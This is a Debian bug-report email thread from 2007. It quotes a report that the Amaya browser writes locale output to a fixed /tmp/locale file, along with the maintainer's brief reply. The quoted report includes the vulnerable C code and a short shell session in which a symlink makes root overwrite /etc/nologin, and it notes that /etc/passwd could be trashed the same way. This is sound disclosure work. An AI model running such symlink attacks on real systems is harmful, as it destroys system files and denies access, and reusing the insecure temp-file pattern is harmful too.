Hi Steve,
I forwarded it upstream who "fixed" it with the new 9.55 release. Given
the progress made with their fix, I will have to work on a proper one...
Many thanks for the report.
Regis
On Tue, July 3, 2007 19:42, Steve Kemp wrote:
> Package: amaya
> Version: 9.54~dfsg.0-1
> Severity: important
>
>
> The Amaya package contains the following code inside
> amaya-9.51/Amaya/thotlib/unicode/ustring.c
>
> {
> int fd;
> char buffer[256];
> memset ( buffer, 0, 256 );
> /* ask the system using locale command */
> system ("locale -ck LC_MESSAGES | grep messages-codeset | sed
> 's/.*=\"//' | sed 's/\"//' > /tmp/locale");
> fd = open ("/tmp/locale", O_RDONLY);
>
>
> This can be abused to allow arbitary files to be created, or truncated,
> when a user runs the browser as this session shows:
>
> # check there are no files, then create an evil symlink
> [EMAIL PROTECTED]:~$ ls -l /etc/nologin /tmp/locale
> ls: /etc/nologin: No such file or directory
> ls: /tmp/locale: No such file or directory
> [EMAIL PROTECTED]:~$ ln -s /etc/nologin /tmp/locale
>
> # wait for root to run the application
> [EMAIL PROTECTED]:~$ sudo -s
> [EMAIL PROTECTED]:~# amaya
>
> # see the file
> [EMAIL PROTECTED]:~# ls /etc/nologin
> /etc/nologin
> [EMAIL PROTECTED]:~# cat /etc/nologin
> UTF-8
>
> Obviously this example relies upon root to run the application and
> linking
> to /etc/passwd would trash the system.
>
> I guess the solution is to generate a secure temporary filename with
> mktemp, mkstemp, or similar..
>
> -- System Information:
> Debian Release: lenny/sid
> APT prefers unstable
> APT policy: (500, 'unstable')
> Architecture: amd64 (x86_64)
>
> Kernel: Linux 2.6.18-xen (SMP w/2 CPU cores)
> Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
> Shell: /bin/sh linked to /bin/bash
>
> Versions of packages amaya depends on:
> ii amaya-data 9.54~dfsg.0-1 Web Browser, HTML Editor and
> Testb
> ii libc6 2.5-11 GNU C Library: Shared
> libraries
> ii libexpat1 1.95.8-3.4 XML parsing C library -
> runtime li
> ii libfreetype6 2.2.1-6 FreeType 2 font engine,
> shared lib
> ii libgcc1 1:4.2-20070627-1 GCC support library
> ii libgl1-mesa-glx [libgl1 6.5.2-5 A free implementation of the
> OpenG
> ii libglu1-mesa [libglu1] 6.5.2-5 The OpenGL utility library
> (GLU)
> ii libjpeg62 6b-13 The Independent JPEG Group's
> JPEG
> ii libpng12-0 1.2.15~beta5-2 PNG library - runtime
> ii libraptor1 1.4.15-3 Raptor RDF parser and
> serializer l
> ii libstdc++6 4.2-20070627-1 The GNU Standard C++ Library
> v3
> ii libwww-ssl0 5.4.0-11 The W3C-WWW library (SSL
> support)
> ii libwxbase2.6-0 2.6.3.2.1.5 wxBase library (runtime) -
> non-GUI
> ii libwxgtk2.6-0 2.6.3.2.1.5 wxWidgets Cross-platform C++
> GUI t
> ii ttf-freefont 20060501cvs-12 Freefont Serif, Sans and Mono
> True
> ii zlib1g 1:1.2.3.3.dfsg-3 compression library - runtime
>
> Versions of packages amaya recommends:
> pn amaya-doc <none> (no description available)
>
> -- no debconf information
>
> Steve
> --
> # Kink-Friendly Dating
> http://ctrl-alt-date.com/
>
>
>
